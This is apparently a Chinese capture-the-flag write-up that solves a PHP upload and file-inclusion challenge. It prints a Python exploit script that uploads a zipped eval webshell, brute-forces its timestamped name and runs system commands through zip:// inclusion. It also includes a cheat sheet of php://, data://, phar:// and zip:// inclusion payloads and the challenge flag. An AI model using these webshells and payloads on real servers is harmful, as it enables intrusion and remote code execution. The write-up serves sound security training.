题目内容提示:上传图片试试吧,注意统一时区问题
打开页面如图,源码没有过滤,随便输入,进入上传目录
根据链接可以看到是文件包含,可以利用编码读取源码,这里只列出有用页面的编码(?page=php://filter/read=convert.base64-encode/resource=upload
page=php://filter/read=convert.rot13/resource=upload)
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiIgPg0KDQo8aGVhZD4NCiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KICA8dGl0bGU+VXBsb2FkIEZvcm08L3RpdGxlPg0KDQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9tZXllci1yZXNldC8yLjAvcmVzZXQubWluLmNzcyI+DQoNCiAgPGxpbmsgcmVsPSdzdHlsZXNoZWV0JyBocmVmPSdodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9Um9ib3RvOjQwMCwxMDAsMzAwLDUwMCw3MDAsOTAwJz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0naHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1vbnRzZXJyYXQ6NDAwLDcwMCc+DQo8bGluayByZWw9J3N0eWxlc2hlZXQnIGhyZWY9J2h0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuMy4wL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyc+DQoNCiAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL3N0eWxlLmNzcyI+DQoNCg0KPC9oZWFkPg0KDQo8Ym9keT4NCjw/cGhwDQogICAgJGVycm9yID0gIiI7DQogICAgJGV4dHMgPSBhcnJheSgianBnIiwicG5nIiwiZ2lmIiwianBlZyIpOw0KICAgIGlmKCFlbXB0eSgkX0ZJTEVTWyJpbWFnZSJdKSkNCiAgICB7DQogICAgICAgICR0ZW1wID0gZXhwbG9kZSgiLiIsICRfRklMRVNbImltYWdlIl1bIm5hbWUiXSk7DQogICAgICAgICRleHRlbnNpb24gPSBlbmQoJHRlbXApOw0KICAgICAgICBpZigoQCRfdXBmaWxlU1siaW1hZ2UiXVsic2l6ZSJdIDwgMTAyNDAwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYoaW5fYXJyYXkoJGV4dGVuc2lvbiwkZXh0cykpew0KICAgICAgICAgICAgICAkcGF0aCA9ICJ1cGxvYWRzLyIubWQ1KCR0ZW1wWzBdLnRpbWUoKSkuIi4iLiRleHRlbnNpb247DQogICAgICAgICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJpbWFnZSJdWyJ0bXBfbmFtZSJdLCAkcGF0aCk7DQogICAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDmiJDlip8hIjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgZWxzZXsNCiAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDlpLHotKXvvIEiOw0KICAgICAgICB9DQoNCiAgICAgICAgfWVsc2V7DQogICAgICAgICAgJGVycm9yID0gIuaWh+S7tui/h+Wkp++8jOS4iuS8oOWksei0pe+8gSI7DQogICAgICAgIH0NCiAgICB9DQoNCj8+DQo8ZGl2IGNsYXNzPSJmb3JtIj4NCiAgPGRpdiBjbGFzcz0idGh1bWJuYWlsIj48aW1nIHNyYz0iaGF0LnN2ZyIvPjwvZGl2Pg0KICA8Zm9ybSBjbGFzcz0ibG9naW4tZm9ybSIgYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+DQogICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImltYWdlIiBwbGFjZWhvbGRlcj0iaW1hZ2UiLz4NCiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+bG9naW48L2J1dHRvbj4NCiAgPC9mb3JtPg0KICA8P3BocCBlY2hvICRlcnJvcjs/Pg0KPC9kaXY+DQo8c2NyaXB0IHNyYz0naHR0cDovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9qcXVlcnkvMi4xLjMvanF1ZXJ5Lm1pbi5qcyc+PC9zY3JpcHQ+DQoNCg0KDQo8c2NyaXB0ICBzcmM9ImpzL2luZGV4LmpzIj48L3NjcmlwdD4NCg0KDQoNCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo<!DOCTYPE html>
<html lang="en" ><head><meta charset="UTF-8"><title>Upload Form</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900'>
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Montserrat:400,700'>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css'><link rel="stylesheet" href="css/style.css"></head><body>
<?php$error = "";$exts = array("jpg","png","gif","jpeg");if(!empty($_FILES["image"])){$temp = explode(".", $_FILES["image"]["name"]);$extension = end($temp);if((@$_upfileS["image"]["size"] < 102400)){if(in_array($extension,$exts)){$path = "uploads/".md5($temp[0].time()).".".$extension;move_uploaded_file($_FILES["image"]["tmp_name"], $path);$error = "上传成功!";}else{$error = "上传失败!";}}else{$error = "文件过大,上传失败!";}}?>
<div class="form"><div class="thumbnail"><img src="hat.svg"/></div><form class="login-form" action="" method="post" enctype="multipart/form-data"><input type="file" name="image" placeholder="image"/><button type="submit">login</button></form><?php echo $error;?>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="js/index.js"></script></body></html>
根据源码可以看到,上传文件限制了格式、大小、文件名,文件名更是加上时间戳,经过Md5加密,这样就扰乱了我们上传的链接地址。只能通过脚本来实现。
# -*- coding: UTF-8 -*-
import time
import requests
import hashlib
url = "http://ip:80/"
def md5(str):m = hashlib.md5()m.update(('shell'+str).encode())return m.hexdigest()
files = {"image":("shell.jpg",open("shell.jpg","rb"))#木马文件作为参数
}
t = int(time.time()+28800)#8个时区
requests.post(url=url+"index.php?page=upload",files=files)
for i in range(t-300,t+300):#遍历,找到上传的文件path = "uploads/"+md5(str(i))+".jpg"status = requests.get(url=url+path).status_codeif status == 200:print(path)break
data = {#"cmd":"system('ls /');""cmd":"system('cat /f11111111_ag');"
}
'''
file:// 访问本地文件系统
http:// 访问 HTTP(s) 网址
ftp:// 访问 FTP(s) URLs
php:// 访问各个输入/输出流(I/O streams)
zlib:// 压缩流
data:// 数据(RFC 2397)
glob:// 查找匹配的文件路径模式
phar:// PHP 归档
ssh2:// Secure Shell 2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流php://filter
读取文件源码
php://filter可获取指定文件源码,如果再利用包含函数漏洞,php://filter流会被当作php文件执行,
一般对其进行编码,使其不被执行,获取到编码后解码,从而达到任意文件的读取
……?file=php://filter/read=convert.base64-encode/resource=文件路径
……?file=php://filter/write=convert.base64-encode/resource=文件路径data:// 数据流封装器,以传递相应格式的数据,可以用来执行PHP代码
data://text/plain,内容
data://text/plain;base64,base64加密内容
……?file=data://text/plain,<?php%20phpinfo();?>
……?file=data://text/plain;base64,base64加密后内容压缩文件为协议用法:用于读取压缩文件,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀
phar://[压缩文件路径]/[压缩文件内的子文件名]
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](%23为#)
compress.bzip2://file.bz2
示例:
1、将php文件添加到压缩文件中(phar)
……?file=phar://D:/……1.zip/1.php
2、将php文件添加到1.zip中,并将1.zip重命名为1.jpg,再上传到目标服务器(zip)
……?file=zip://D:/……1.jpg%231.php
3、压缩1.php为1.bz2(bzip2)
……?file=compress.bzip2://D:/……1.bz2
'''
requrl=url=url+"index.php?page=zip://"+path+"%23shell"
print(requrl)
content = requests.post(url=requrl,data=data).content
#协议里说是绝对路径,但是linux下不可以访问,在本地windows下必须用绝对路径,相对路径不行
#content = requests.post(url=url+"index.php?page=zip:///var/www/html/"+path,data=data).content
print (content)
这道题非常难,知识点非常多,文件包含,伪协议,命令执行,木马上传,重点是为协议任意格式文件读取。环节很多,浪费了很长时间。
<?php @eval($_POST['cmd']); ?> 压缩为zip格式文件
flag{3809f2ce999b4d99c8051e285505a014}